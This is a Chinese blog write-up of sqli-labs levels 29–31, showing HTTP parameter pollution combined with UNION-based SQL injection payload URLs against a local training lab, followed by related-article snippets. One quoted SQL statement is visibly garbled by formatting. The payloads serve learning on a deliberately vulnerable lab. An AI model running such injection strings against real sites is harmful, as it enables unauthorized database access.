Sqllibs-less29-31-WAF

最新推荐文章于 2024-04-07 13:04:32 发布
最新推荐文章于 2024-04-07 13:04:32 发布
阅读量232 收藏
点赞数
分类专栏: # Sqllibs_master
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901038/article/details/107325351
版权

文章目录

本文主要来自于:https://www.cnblogs.com/lcamry/category/846064.html

29.less29-Protection with WAF

参考链接:https://www.cnblogs.com/lcamry/p/5762952.html

首先先看下tomcat中的index.jsp文件(说实话,我的tomcat里面index.jsp太多了,没注意去哪里找这个)
在这里插入图片描述

在apache的index.php中,sql语句为

sql="SELECT∗FROMusersWHEREid=′id' LIMIT 0,1";

因此我们根据HPP的原理,我们直接payload:【在这里我试了一下,把一个参数去掉也是可以的,额,走了个乖吧,这关主要的考点是HPP,所以还是按照他的来吧!】

http://192.168.10.208:8081/sqli-labs-master/Less-29/?id=1&id=-2%27union%20select%201,user(),3--+

在这里插入图片描述

至于如何注入到其他的内容,只需要自己构造union后面的sql语句即可。

30.less30-Protection with WAF-Double Quotes

类似于上一关,只是将闭合方式换成了双引号,如下图。
在这里插入图片描述

在这里给出一个查找当前用户的union注入语句,其余的语句还请读者自己发散思路啦!

http://192.168.10.208:8081/sqli-labs-master/Less-30/?id=1&id=-2"union select 1,user(),3--+

31.less31-FUN with WAF

类似于上一关,只是将闭合方式换成了双引号+括号,如下图。
在这里插入图片描述
在这里给出一个查找当前用户的union注入语句,其余的语句还请读者自己发散思路啦!

http://192.168.10.208:8081/sqli-labs-master/Less-31/?id=1&id=-2") union select 1,user(),3--+

在这里插入图片描述

xor0ne_10_01
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【愚公系列】2023年05月 Web渗透测试之SQL注入(sqli-labs、Less-29-31
时光隧道
08-02 4万+
SQL注入是一种常见的攻击方式,它利用应用程序未对用户输入的数据进行正确的过滤和验证,以达到访问或篡改系统数据的目的。具体来说,攻击者可以在注入点上构造恶意的SQL语句,并成功提交给数据库执行,从而造成数据泄露、篡改或者破坏。SQL注入攻击的应用场景非常广泛,常见于Web应用、数据库应用或其他需要使用SQL语句进行数据操作的应用中。
(手工)【sqli-labs29-31】参数污染、报错回显、WAF报错跳转、字符型注入
07-14 482
SQL-WAF报错页面跳转】
sqli-labs (less-29)
kukudeshuo的博客
03-13 678
sqli-labs (less-29) 进入29关,输入ID=1 输入 http://127.0.0.1/sql1/Less-29/?id=1' #回显错误 根据错误显示,判断闭合方式为’–+,但是这里不就跟less-1一模一样了吗,我们打开less-29的源文件看看,发现不只一个页面 我们输入 http://127.0.0.1/sql1/Less-29/login.php?id=1 输入 http://127.0.0.1/sql1/Less-29/login.php?id=1' 这里意思为
SQL 注入之 Windows/Docker 环境 SQLi-labs 靶场搭建!
最新发布
朱雀随云记的博客
04-07 1364
4、打开浏览器,输入“http://windows服务器ip/sqli-labs-master/” ,可以看到如下的界面,点击“Setup/reset Database for labs”,会出现Access denied的提示。3、执行:docker run -dt --name sqli-labs -p 81:80 --rm acgpiano/sqli-labs, 将镜像运行为容器。--name sqli-labs 将容器命名为sqli-labs。acgpiano/sqli-labs 镜像名。
SQLi LABS Less-29
wangyuxiang946的博客
08-16 1万+
29关使用GET请求提交参数,在url中构造payload即可 源码中并没有做什么过滤,直接测试注入点即可 在url中输入 1'and true-- a,源码中的SQL会拼接成下面这样 注释后面的内容不起作用,所以真正执行的SQL是这样的 and后面的true会使SQL恒成立,SQL正常查询出用户内容,并在页面显示出来 接下来再输入1'and false-- a,参数拼接到SQL中是下面这样的 由于注释后面的内容不起作用 ,所以真正执行的SQL应该是...
SQLMAP脚本-sql-labs-Less-28-29
m0_69844818的博客
01-03 400
HTTP参数污染(HTTP Parameter Pollution) 攻击者通过在HTTP请求中插入特定的参数来发起攻击,如果Web应用中存在这样的漏洞,可以被攻击者利用来进行客户端或者服务器端的攻击。这个labs是一个HTTP参数污染所以也简单写就需要&连接一些就行了,想了解这东西的去搜索吧,这里教的是怎么写脚本提供思路。使用双写union绕过,编写cx.py脚本。忒忒后端代码,比28简单更多。一样的使用28的脚本即可拿下。
waf-master上层工具
08-16
配合gstreamer-imx安装,gstreamerm -imx是一套gstreamer 1.0 imx6视频插件,主要由Carlos Giani a.k开发。dv_(伟大的工作!)一旦稳定,这些插件“希望”将取代飞思卡尔BSP gstreamer 0.10插件,这些插件显示了...
lua-resty-waf:基于OpenResty堆栈的高性能WAF
02-03
lua-resty-waf:基于OpenResty堆栈的高性能WAF
terraform-aws-waf:配置AWS Web Application防火墙
02-04
创建一个WAF并将其与应用程序负载平衡器(ALB)关联 创建以下资源: Web应用程序防火墙(WAF) 链接F5管理的OWASP规则以阻止WAF常见攻击 创建WAF规则以按源IP地址阻止请求(注意:被阻止的IP列表不受此模块管理) ...
terraform-aws-waf-global
03-12
terraform-aws-waf-global Terraform模块-创建全局WAF。 它是100%开源的,并根据许可。用法这只是一个基本说明。 将此存储库作为模块包含在现有Terraform代码中: module " waf-global " { source = " ...
WAF6.X-旁路部署.doc
08-07
旁路检测模式,顾名思义,就是只检测,不阻断的模式,此模式部署,WAF只能记录攻击+访问日志,不能对数据包进行阻断处理; 旁路检测+阻断,就是指交换机配置镜像流量给WAFWAF既能监测,又能阻断的部署方式。具体...
SQLi-LABS Less-29到Less-31
m0_64898960的博客
05-01 97
Less-29题目 Less-29的题目提到了WAF,看题目的意思应该是一个保护网站的东西 百度了一下 WAF就是Web Application Firewall,主要功能是拦截入侵尝试,比如SQL Injection, XSS, 路径遍历, 窃取敏感数据,CC攻击等。 就是说这个东西应该会拦截我们的SQL注入 开始尝试注入,发现一切太过简单… 百度过别人的做法之后,才知道这是双服务器,真正打开这题需要搭建jspstudy…但是比较麻烦… 也有简单的,正如其他博客写的一样,直接跳转到真正的注入页面…
sqli-labs靶场通关(Less-29~37)
qq_43381463的博客
01-29 101
sqli-labs靶场通关(Less-29~37)
sql_libs第一关
Xor0ne
02-17 1043
第一关通关笔记:2019/6/16 低等级详解的相关网站:https://www.jianshu.com/p/078df7a35671 http://www.storysec.com/dvwa-sql-injection.html dvwa的闯关:https://www.freebuf.com/articles/web/120747.html BP:https://blog.csdn.ne...
SQL-libs漏洞思路总结
转瞬都有的博客
08-31 311
本文介绍了SQL注入里面常用到的十大注入方式,这里介绍的更多的是方法和技巧。如果需要更加详细的有关SQL漏洞的介绍,请关注我,在我的SQL闯关栏里就有我对于SQL闯关内容的详解。最后希望读者能谅解本文是以大段的的文字进行叙述的,而没有参加更多的图片。其实我还是想更好的通过叙述的方式来让我的读者领略SQL-libs中的技巧和方法。最后希望能给看我作品的人得以启发和思考。
sqli-libs系列
qq_43511094的博客
12-31 1504
sqllibs information_schema中的表实际上是视图,而不是基本表,因此,文件系统上没有与之相关的文件 information_schema库中常用的表 schemate 这个表就很强,可以显示所有数据库的信息,注意,是数据库,不是表,show databases 就是从这个表中获取数据,schema_name就
靶场系列:sqllibs安装、sqli-labs靶场搭建以及闯关(1-22关)
weixin_54626591的博客
12-05 2443
sqllibs安装、sqli-labs靶场搭建以及闯关(1-22关)
零基础学SQL注入必练靶场之SQLiLabs(搭建+打靶)
热门推荐
Ms08067安全实验室
12-20 1万+
文章来源 | MS08067Web零基础就业班1期作业本文作者:giunwr、tyrant(零基础1期)SQLi-Labs是一个专业的SQL注入漏洞练习靶场,零基础的同学学SQL注入的时候,sqli-labs这个靶场是必练的,它里面包含了很多注入场景,以及在sql注入的时候遇到的各种问题,适用于GET和POST场景,包含了以下注入:一、作业描述完成sqllibs前18关,尽可能使用多的方法二、s...
sql-libs 手工注入步骤
m0_59035933的博客
08-13 1517
一.首先输入',发现有报错,很高兴的事情,说明有漏洞。 1.程序没有过滤特殊字符',提交的内容接过了sql引擎解析 2.回显的内容看到了MYSQL字样 二.输入:1’ or ‘1’=‘1 出现了大量信息,但是因为这一关的代码只能输出一组数据,所以看到的也只有一组数据 三.我们希望得到数据库的其他关键数据,所以要用到union联合查询。而联合查询的关键是需要知道主查询列数,因为联合查询需要和主查询的列数相同,不然会出现报错。所以我们使用ord...
DDos-deflate如何联动WAF
03-31
DDoS-deflate和WAF可以通过以下几种方式联动: 1. 在WAF中设置DDoS-deflate的防护规则,当WAF检测到DDoS攻击流量时,自动触发DDoS-deflate的防护功能,对攻击流量进行防护。 2. 在DDoS-deflate中设置WAF的白名单,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值